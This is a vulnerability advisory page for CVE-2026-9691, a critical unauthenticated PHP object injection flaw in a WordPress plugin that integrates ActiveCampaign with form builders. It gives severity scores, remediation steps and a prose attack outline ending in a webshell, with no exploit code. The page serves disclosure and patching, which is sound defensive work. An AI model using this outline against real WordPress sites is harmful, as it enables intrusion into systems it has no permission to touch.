Skip to main content

Integration for ActiveCampaign CVE-2026-9691

| EUVD-2026-36908 CRITICAL
Deserialization of Untrusted Data (CWE-502)
2026-06-15 Patchstack GHSA-gpvc-87r4-hfmw
PHP Deserialization Integration For Activecampaign And Contact Form 7 Wpforms Elementor Ninja Forms Elementor
9.8
CVSS 3.1 · Vendor: Patchstack
Share

Severity by source

Vendor (Patchstack) PRIMARY
9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
9.8 CRITICAL

Unauthenticated network-reachable WordPress endpoint deserializes attacker input, enabling RCE via POP chains with full CIA impact, matching AV:N/AC:L/PR:N/UI:N.

3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (Patchstack).

CVSS VectorVendor: Patchstack

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

1
Analysis Generated
Jun 15, 2026 - 21:21 vuln.today

DescriptionCVE.org

Unauthenticated PHP Object Injection in Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms <= 1.1.1 versions.

AnalysisAI

Unauthenticated PHP Object Injection in the WordPress plugin 'Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms' (versions 1.1.1 and earlier) allows remote attackers to inject crafted serialized objects that are deserialized by the plugin, enabling abuse of POP gadget chains for code execution, file operations, or data tampering. The flaw scores CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) and impacts any WordPress site running the affected CRM Perks integration plugin. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Identify WordPress site running vulnerable plugin
Delivery
Send HTTP request with serialized PHP payload
Exploit
Plugin deserializes attacker object
Execution
POP gadget chain executes via magic methods
Persist
Write webshell or run arbitrary PHP
Impact
Establish persistence on site
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires only that the affected CRM Perks 'Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms' plugin at version 1.1.1 or earlier be installed and active on a reachable WordPress site, with the vulnerable deserialization entry point (typically a plugin AJAX action, REST route, or form-handling hook) exposed to unauthenticated HTTP requests - consistent with CVSS PR:N and UI:N. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Risk is high based on the CVSS vector: network attack vector, low complexity, no privileges, and no user interaction with high CIA impact (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An unauthenticated attacker sends a crafted HTTP POST to a public-facing WordPress endpoint exposed by the plugin, embedding a serialized PHP object string in a parameter that the plugin passes to unserialize(). When the object is instantiated, magic methods (__wakeup, __destruct, __toString) trigger a POP gadget chain reachable in WordPress core or another loaded plugin, allowing the attacker to write a webshell or execute arbitrary code as the web user. …
Remediation Patch available per vendor advisory; upgrade the plugin to a version greater than 1.1.1 as listed by CRM Perks through the WordPress.org plugin repository, with the Patchstack advisory at https://patchstack.com/database/wordpress/plugin/cf7-active-campaign/vulnerability/wordpress-integration-for-activecampaign-and-contact-form-7-wpforms-elementor-ninja-forms-plugin-1-1-1-php-object-injection-vulnerability serving as the reference (an exact fixed version is not independently confirmed in the supplied data). … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

24 hours: Identify all WordPress instances using 'Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms' plugin version 1.1.1 or earlier; immediately disable the plugin if not business-critical. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-55692 HIGH POC
7.5 Jun 19

Stored cross-site scripting in the StarCitizenWiki EmbedVideo MediaWiki extension (versions <= 4.0.0) allows any user wi
CVE-2026-9815 MEDIUM POC
6.5 Jun 18

Unrestricted PHP file upload in the MagicForm WordPress plugin (through version 0.1.3) enables unauthenticated remote co
CVE-2026-48908 CRITICAL
10.0 Jun 20

Remote unauthenticated arbitrary file upload in JoomShaper SP Page Builder extension for Joomla (versions 1.0.0 through

CVE-2026-48939 CRITICAL
10.0 Jun 20

Arbitrary PHP file upload in the iCagenda extension for Joomla enables remote unauthenticated attackers to abuse the eve
CVE-2025-69108 CRITICAL
9.8 Jun 16

Unauthenticated PHP Object Injection in the ThemeREX Hot Coffee WordPress theme (versions ≤ 1.7) allows remote attackers

Share

CVE-2026-9691 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy